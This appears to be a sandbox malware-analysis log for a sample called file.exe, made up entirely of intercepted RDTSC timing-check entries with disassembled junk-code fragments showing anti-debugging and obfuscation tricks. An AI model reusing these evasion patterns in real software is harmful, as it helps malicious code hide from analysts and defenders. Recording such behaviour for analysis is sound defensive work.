Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973811 second address: 973818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973818 second address: 973821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973821 second address: 97382B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973965 second address: 973969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973969 second address: 973985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FFBC91A3BD6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973C81 second address: 973C95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DA9Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973C95 second address: 973C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973C99 second address: 973CEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FFBC8B2DA9Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b pushad 0x0000001c js 00007FFBC8B2DA96h 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007FFBC8B2DAA5h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push ebx 0x0000002d jng 00007FFBC8B2DA96h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9740FB second address: 974101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974101 second address: 97412B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA2h 0x00000009 popad 0x0000000a jmp 00007FFBC8B2DAA3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB7B3 second address: 8FB7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB7B7 second address: 8FB7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB7BD second address: 8FB7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FFBC91A3BD6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB7CD second address: 8FB7D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9746DD second address: 9746F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC91A3BE3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97840A second address: 97843C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA3h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FFBC8B2DA96h 0x0000000f jmp 00007FFBC8B2DAA5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946A79 second address: 946A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946FA5 second address: 946FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC8B2DA9Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946FB4 second address: 791B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jbe 00007FFBC91A3BDCh 0x00000010 push dword ptr [ebp+122D0595h] 0x00000016 push ecx 0x00000017 xor dword ptr [ebp+122D23F0h], edi 0x0000001d pop edi 0x0000001e call dword ptr [ebp+122D1DD7h] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D189Fh], edi 0x0000002b xor eax, eax 0x0000002d jmp 00007FFBC91A3BE0h 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 mov dword ptr [ebp+122D189Fh], esi 0x0000003c mov dword ptr [ebp+122D39AAh], eax 0x00000042 jmp 00007FFBC91A3BDCh 0x00000047 jmp 00007FFBC91A3BE7h 0x0000004c mov esi, 0000003Ch 0x00000051 jmp 00007FFBC91A3BE9h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FFBC91A3BE6h 0x0000005f clc 0x00000060 lodsw 0x00000062 stc 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 clc 0x00000068 mov ebx, dword ptr [esp+24h] 0x0000006c sub dword ptr [ebp+122D189Fh], edx 0x00000072 nop 0x00000073 push esi 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9470B3 second address: 9470CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FFBC8B2DA96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jl 00007FFBC8B2DAA8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9470CC second address: 9470D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9470D0 second address: 9470D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947220 second address: 94725D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jnp 00007FFBC91A3BE9h 0x00000011 jmp 00007FFBC91A3BE3h 0x00000016 jnc 00007FFBC91A3BDCh 0x0000001c jno 00007FFBC91A3BD6h 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 push ecx 0x00000026 pushad 0x00000027 jc 00007FFBC91A3BD6h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9473A6 second address: 9473F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007FFBC8B2DA9Ch 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBC8B2DAA7h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007FFBC8B2DAA0h 0x0000001f mov bl, C3h 0x00000021 popad 0x00000022 ja 00007FFBC8B2DA96h 0x00000028 popad 0x00000029 nop 0x0000002a push ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9473F9 second address: 94741D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94741D second address: 947421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947421 second address: 947425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947599 second address: 9475AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBC8B2DA9Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947A38 second address: 947A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947A3C second address: 947A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947DD8 second address: 947DDE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947DDE second address: 9225B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DA9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007FFBC8B2DAADh 0x00000010 push edx 0x00000011 jmp 00007FFBC8B2DAA5h 0x00000016 pop edx 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FFBC8B2DA98h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 call dword ptr [ebp+122D2727h] 0x00000038 jno 00007FFBC8B2DAB0h 0x0000003e push esi 0x0000003f jng 00007FFBC8B2DA9Eh 0x00000045 push edi 0x00000046 pop edi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97885B second address: 978861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9789CC second address: 9789D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9789D2 second address: 9789D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9789D8 second address: 9789E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FFBC8B2DA96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978B4C second address: 978B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978C9A second address: 978CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007FFBC8B2DA98h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 jnl 00007FFBC8B2DA96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978F7F second address: 978FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFBC91A3BE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FFBC91A3BDCh 0x00000011 jng 00007FFBC91A3BEEh 0x00000017 jmp 00007FFBC91A3BE8h 0x0000001c pushad 0x0000001d jmp 00007FFBC91A3BE4h 0x00000022 jmp 00007FFBC91A3BE4h 0x00000027 jnc 00007FFBC91A3BD6h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 979174 second address: 97917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97917B second address: 9791AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC91A3BE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FFBC91A3BD8h 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9791AA second address: 9791AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984F19 second address: 984F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC91A3BE7h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984F3C second address: 984F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D4E second address: 983D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D54 second address: 983D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D58 second address: 983D6C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FFBC91A3BF1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D6C second address: 983D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D8E second address: 983D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D93 second address: 983D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D99 second address: 983D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9841C5 second address: 9841CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9841CB second address: 9841E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984639 second address: 984640 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984C08 second address: 984C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984C0C second address: 984C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFBC8B2DA9Ch 0x0000000c jl 00007FFBC8B2DA96h 0x00000012 jmp 00007FFBC8B2DAA9h 0x00000017 jmp 00007FFBC8B2DAA0h 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984C55 second address: 984C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDEh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 989570 second address: 98957C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FFBC8B2DA96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98957C second address: 989586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFBC91A3BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B8B4 second address: 98B8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B8BA second address: 98B8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FFBC91A3BD8h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFBC91A3BDBh 0x00000017 je 00007FFBC91A3BD6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B8DD second address: 98B8E7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B8E7 second address: 98B8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 990868 second address: 99086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98FCFB second address: 98FCFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98FCFF second address: 98FD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9902B0 second address: 9902D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 push ebx 0x0000000a jnl 00007FFBC91A3BD6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 990437 second address: 990451 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FFBC8B2DA9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9959A7 second address: 9959AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9959AD second address: 9959C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 995C0B second address: 995C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 995C11 second address: 995C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 995C15 second address: 995C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947842 second address: 9478C5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov ebx, dword ptr [ebp+1248882Fh] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FFBC8B2DA98h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push eax 0x0000002d mov dh, 6Ch 0x0000002f pop ecx 0x00000030 add eax, ebx 0x00000032 stc 0x00000033 push eax 0x00000034 jmp 00007FFBC8B2DAA5h 0x00000039 mov dword ptr [esp], eax 0x0000003c mov cx, 1A12h 0x00000040 push 00000004h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FFBC8B2DA98h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000015h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 js 00007FFBC8B2DA96h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 996AF3 second address: 996AF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 996AF8 second address: 996B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FFBC8B2DA9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 996B05 second address: 996B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BE7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9994CA second address: 9994D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9997FE second address: 999809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A12EE second address: 9A12F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFBC8B2DA96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A12F8 second address: 9A132F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FFBC91A3BE2h 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FFBC91A3BD6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A132F second address: 9A1354 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFBC8B2DA96h 0x00000008 js 00007FFBC8B2DA96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jmp 00007FFBC8B2DAA0h 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A1354 second address: 9A135C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A135C second address: 9A1360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A1360 second address: 9A136A instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F322 second address: 99F35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC8B2DAA2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBC8B2DAA2h 0x00000013 jmp 00007FFBC8B2DA9Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F5C9 second address: 99F5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
